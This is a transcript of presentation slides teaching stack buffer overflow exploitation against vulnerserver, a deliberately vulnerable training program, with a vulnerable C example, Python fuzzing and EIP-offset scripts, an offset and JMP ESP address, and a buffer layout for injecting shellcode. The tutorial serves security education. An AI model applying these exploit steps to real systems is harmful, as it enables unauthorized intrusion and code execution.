Exploiting buffer overflows

download Exploiting buffer overflows

of 34

  • date post

    16-Jul-2015
  • Category

    Technology

  • view

    1.884
  • download

    0

Embed Size (px)

Transcript of Exploiting buffer overflows

Disclaimer

@cyberkryption

The views expressed within this presentation or afterwards are my own and in no way represent my employer.

The following presentation describes how to conduct a buffer overflow attack.

These attacks are illegal to perform against systems that you do not have explicit permission to test.

I assume no responsibility for any actions you perform based on the content of this presentation or subsequent conversations.

Caveat: With knowledge comes responsibility

Who am I

@cyberkryption

Who is This?

Von Neuman Explained..

Extract from Engineer's minute at www.youtube.com/watch?v=5BpgAHBZgec

Phrack 49

Meet the Stack

Each program has it's own stack as a memory structure.

Program data such as variable are also saved

Data is 'pushed' on to the stack and 'popped' off the stack

https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

A Vulnerable 'C' program

#includeint main(int argc, char *argv[]){char buff[20];printf("copying into buffer"); strcpy(buff,argv[1]);return 0;}

We defined a character of size 20 bytes, it reserves some space on the stack

We copy the buffer using string copy without checking it's size

If we pass more then the buffer size (20 bytes) we get a buffer overflow !!!

Stack Overwrite

Data on the stack is overwritten.

Extra input overwrites other data in the stack

Eventually the instruction pointer is overwritten and we have control!!!

https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

Meet the CPU Registers & Pointers

CPU PointersEIP = Points to the next address in memory to be executedESP = Stack Pointer. EBP = Stack Pointer Base Pointer

If we can overwrite EIP we can control execution flow other wise it's a DOS exploit.

CPU RegistersEAX AccumulatorEBX Base RegisterECX Counter RegisterEDX Data Register

Meet vulnserver

Initial Fuzzing

#!/usr/bin/pythonimport socketserver = '192.168.1.65'port = 9999

length = int(raw_input('Length of attack: '))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)connect = s.connect((server, port))print s.recv(1024)print "Sending attack length ", length, ' to TRUN .'attack = 'A' * lengths.send(('TRUN .' + attack + '\r\n'))print s.recv(1024)s.send('EXIT\r\n')print s.recv(1024)s.close()

Initial Fuzzing - Video

Initial Crash - Video

Path to Victory

Determine Buffer Length. Any Register pointing to buffer?

Locate EIP overwrite offset in buffer.Enough space for shellcode?

Determine JMP ESP location ?

Resolve any bad characters

'A' *3000 / ESP = Buffer

????????

????????

????????

EIP Hunting

#!/usr/bin/pythonimport socketserver = '192.168.1.65'port = 9999

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)connect = s.connect((server, port))print s.recv(1024)

print "Sending Evil Buffer to TRUN ."attack = " < insert cyclic pattern here> "s.send(('TRUN .' + attack + '\r\n'))print s.recv(1024)s.send('EXIT\r\n')print s.recv(1024)s.close()

EIP Hunting Cyclic Pattern Crash

How to Locate EIP Overwrite

After crash with cyclic pattern, we find characters of 396F4348 overwriting the EIP register

Metasploit pattern_create.rb to create a cyclic pattern of 3000 non repeating characters.

Lastly use pattern offset to find EIP overwrite

Use convert.sh for HEX to ASCII conversion

Locating EIP Offset - Video

EIP Hunting Part II

#!/usr/bin/pythonimport socketserver = '192.168.1.65'sport = 9999

prefix = 'A' * 2006eip = 'BBBB'padding = 'F' * (3000 - 2006 - 4)attack = prefix + eip + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)connect = s.connect((server, sport))print s.recv(1024)print "Sending Buffer to TRUN "s.send(('TRUN .' + attack + '\r\n'))print s.recv(1024)s.send('EXIT\r\n')print s.recv(1024)s.close()

EIP & Buffer Space Confirmed

Buffer Space = 023AFAEB - 023AF9E0 = 980 Bytes

Path to Victory

Determine Buffer Length. Any Register pointing to buffer?

Locate EIP overwrite offset in buffer.Enough space for shellcode?

Determine JMP ESP location ?

Resolve any bad characters

'A' *3000 / ESP = Buffer

4 Bytes > 2006 + 980 bytes shellcode

EIP Overwite

'A' * 2006

Shellcode

Buffer Construction

????????

????????

Determining JMP ESP Memory Location

Path to Victory

Determine Buffer Length. Any Register pointing to buffer?

Locate EIP overwrite offset in buffer.Enough space for shellcode?

Determine JMP ESP location ?

Resolve any bad characters

'A' *3000 / ESP = Buffer

4 Bytes > 2006 + 980 bytes shellcode

EIP Overwite

'A' * 2006

Shellcode

Buffer Construction

625011AF in essfunc.dll

????????

The Bad Character Problem

Hex Dec Description--- --- ---------------------------------------------0x00 0 Null byte, terminates a C string 0x0A 10 Line feed, may terminate a command line 0x0D 13 Carriage return, may terminate a command line 0x20 32 Space, may terminate a command line argument

Bad Characters break our code when executed on the stack, for example 0x00 will stop our code executing!!

Determining Bad Characters

Determining Bad Characters

Path to Victory

Determine Buffer Length. Any Register pointing to buffer?

Locate EIP overwrite offset in buffer.Enough space for shellcode?

Determine JMP ESP location ?

Resolve any bad characters

'A' *3000 / ESP = Buffer

4 Bytes > 2006 980 bytes shellcode

EIP Overwite

'A' * 2006

Shellcode

Buffer Construction

625011AF in essfunc.dll

0x00

Lets Create some Shellcode

Final Buffer Structure & Operation

625011AF

EIP Overwite

'A' * 2006

Shellcode

NOP Sled

JMP ESP

Buffer Overflow starts here

Execution to 625011AF

JMP ESP in 625011AF redirects to NOP SLED

Shellcode Runs

\xCC Breakpoint

Breakpoint Activated

Putting it all together

CVE2012-5958 /5959

CVE2012-5958 /5959

Questions ????

TWITTER: @cyberkryption

BLOG: cyberkryption.wordpress.com